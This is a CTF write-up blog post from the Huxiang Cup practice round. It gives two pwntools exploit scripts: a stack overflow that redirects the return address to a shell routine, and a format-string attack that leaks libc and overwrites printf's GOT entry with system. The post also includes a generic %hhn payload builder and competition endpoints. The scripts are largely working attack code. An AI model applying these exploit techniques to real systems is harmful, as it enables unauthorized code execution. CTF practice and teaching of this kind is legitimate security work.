
湖湘杯练习赛

whoami

老题目

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# Local run; the remote line below is the competition endpoint, left disabled.
r = process("./whoami")
#r = remote("101.71.29.5",10013)
print r.recv()
r.sendline("1")
print r.recv()
# Address chosen by the author (the name suggests a shell-spawning routine);
# NOTE(review): not derivable from this page -- confirm against the binary.
shell_addr = 0x400896
# 56 filler bytes followed by the 8-byte address -- presumably the distance
# from the overflowed buffer to the saved return address; binary-specific.
payload = "a"*56+p64(shell_addr)
r.sendline(payload)
r.interactive()

# flag{927d379f30f26948d94a2285cd2d7bd7}

fmt

也是老题目

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

local = 1
host = '183.129.189.60'
port = 10043
context.log_level = 'debug'
exe = './5c149c66064fa'
context.binary = exe
elf = ELF(exe)
# pwntools' guess of the libc the binary loads -- TODO confirm it matches
# the remote, since exp() relies on a hard-coded libc offset.
libc = elf.libc


# `local` selects between spawning the binary and connecting to `host:port`;
# don't forget to change it.
if local:
    io = process(exe)
else:
    io = remote(host,port)

# Short I/O helpers over `io`; every outgoing value is coerced with str().
s = lambda data : io.send(str(data))
sa = lambda delim,data : io.sendafter(str(delim), str(data))
sl = lambda data : io.sendline(str(data))
sla = lambda delim,data : io.sendlineafter(str(delim), str(data))
r = lambda numb=4096 : io.recv(numb)
ru = lambda delim,drop=True : io.recvuntil(delim, drop)
# Unpack a short little-endian byte string, NUL-padding it to 4/8 bytes.
uu32 = lambda data : u32(data.ljust(4, '\x00'))
uu64 = lambda data : u64(data.ljust(8, '\x00'))
# Print a label and address as a highlighted success line (the parameter `s`
# shadows the `s` helper above only inside this lambda).
lg = lambda s,addr : io.success('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))


# break on aim addr
def debug(addr,PIE=True):
    """Attach gdb to ``io`` with a breakpoint at ``addr``.

    With ``PIE`` set, ``addr`` is treated as an offset: the base of the
    first mapping listed by ``pmap <pid>`` is parsed and added to it
    (assumed to be the text segment -- not verified here).  Otherwise
    ``addr`` is used as an absolute address.
    """
    if PIE:
        # readlines()[1]: pmap's first line is the "pid: command" header.
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))


#===========================================================
# EXPLOIT GOES HERE
#===========================================================

# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
def getAddr(write):
    """Return the low six bytes of ``write``, least-significant first.

    Byte ``i`` is isolated with a mask of ``0xff << (8*i)`` and shifted back
    down.  Zero bytes are dropped, so an entry's position in the returned
    list is not necessarily its byte index in ``write``; bytes 6 and 7 are
    never examined.
    """
    found = []
    mask = 0xff
    for shift in range(0, 48, 8):
        byte = (write & mask) >> shift
        if byte:
            found.append(byte)
        mask <<= 8
    return found

# 划分部分,按大小排序
def Partion(write, bewrite):
    """Pair each non-zero byte of ``write`` with a packed target address.

    Entry ``i`` of ``getAddr(write)`` is paired with ``p64(bewrite + i)``,
    i.e. consecutive addresses starting at ``bewrite``, and the pairs are
    returned sorted by byte value ascending.  Since ``getAddr`` drops zero
    bytes, the pairing only matches true byte positions when none of the
    low six bytes of ``write`` is zero.
    """
    values = getAddr(write)
    pairs = [(value, p64(bewrite + index)) for index, value in enumerate(values)]
    return sorted(pairs, key=lambda pair: pair[0])

# 获得排序后的大小,升序
def sizeUp(part):
    """Return the first element of every pair in ``part``, in the given order.

    When ``part`` comes from ``Partion`` the values are already ascending.
    """
    return [entry[0] for entry in part]

# 打包地址
def packAddr(part):
    """Concatenate the second element (packed address) of every pair in ``part``."""
    return ''.join(entry[1] for entry in part)

# 自动计算偏移
def offsetDeal(size):
    """Compute ``(offset, length)`` for a format chain of ``len(size)`` entries.

    Each entry is budgeted at 12 characters; the total is rounded up to a
    multiple of 8 (``length``) and the number of 8-byte slots it occupies,
    plus a fixed 6, becomes ``offset``.  The 6 is a target-specific constant
    chosen by the author (presumably the ``$`` index of the first
    stack-resident argument) -- not derived here.
    """
    raw = 12 * len(size)
    slots = raw // 8
    if raw % 8:
        slots += 1
    return slots + 6, slots * 8


# 生成payload
def payloadGenerate(size, offset):
    """Build the ``%Nc%M$hhn`` chain for ascending byte values ``size``.

    The first chunk uses ``size[0]`` as width and argument index ``offset``;
    each following chunk uses only the difference from the previous value
    (the printed count is cumulative) and index ``offset + i``.  ``size``
    must be non-empty and sorted ascending (see ``sizeUp``).
    """
    chunks = ["%{}c%{}$hhn".format(size[0], offset)]
    for index, (previous, current) in enumerate(zip(size, size[1:]), 1):
        chunks.append("%{}c%{}$hhn".format(current - previous, offset + index))
    return ''.join(chunks)

## 生成payload并对齐
def fmt_payload(bewrite, write, offset=0):
    """Assemble the full format-string payload that writes ``write`` to ``bewrite``.

    ``offset`` is the ``$`` index of the first packed target address; when 0
    it is taken from ``offsetDeal``.  The format chain is padded with ``'a'``
    to the 8-byte-aligned length ``offsetDeal`` reports, and the packed
    addresses from ``packAddr`` are appended after it.  Prints the offset
    that was used.
    """
    pairs = Partion(write, bewrite)
    widths = sizeUp(pairs)
    targets = packAddr(pairs)
    auto_offset, length = offsetDeal(widths)
    if offset == 0:
        offset = auto_offset
    print('offset is:' + str(offset))
    chain = payloadGenerate(widths, offset).ljust(length, 'a')
    return chain + targets
def exp():
    """Leak a libc pointer, then point printf@GOT at system via ``fmt_payload``.

    As written: ``%2$llx`` prints the second vararg slot, 12 hex chars are
    read back, and the author's libc offset ``0x1bc590`` turns that into the
    libc base; ``fmt_payload`` is then called with the ``$`` index fixed at
    17.  Both constants are target-specific and not derived on this page --
    TODO confirm against the libc/binary actually in use.
    """
    sl("%2$llx")
    libc.address = int(r(12),16) - 0x1bc590
    lg("libc_addr", libc.address)
    printf_got = elf.got['printf']
    system_addr = libc.symbols['system']
    payload = fmt_payload(printf_got, system_addr, 17)
    # Disabled debugger attach; a bare string statement, so it has no effect.
    """
gdb.attach(io,'''
b printf
c
''')
"""
    sl(payload)
    #gdb.attach(io)


if __name__ == '__main__':
    # Run the exploit once, then hand the connection over to the user.
    exp()
    io.interactive()

本文作者:NoOne
本文地址：https://noonegroup.xyz/posts/c820405f/
版权声明:转载请注明出处!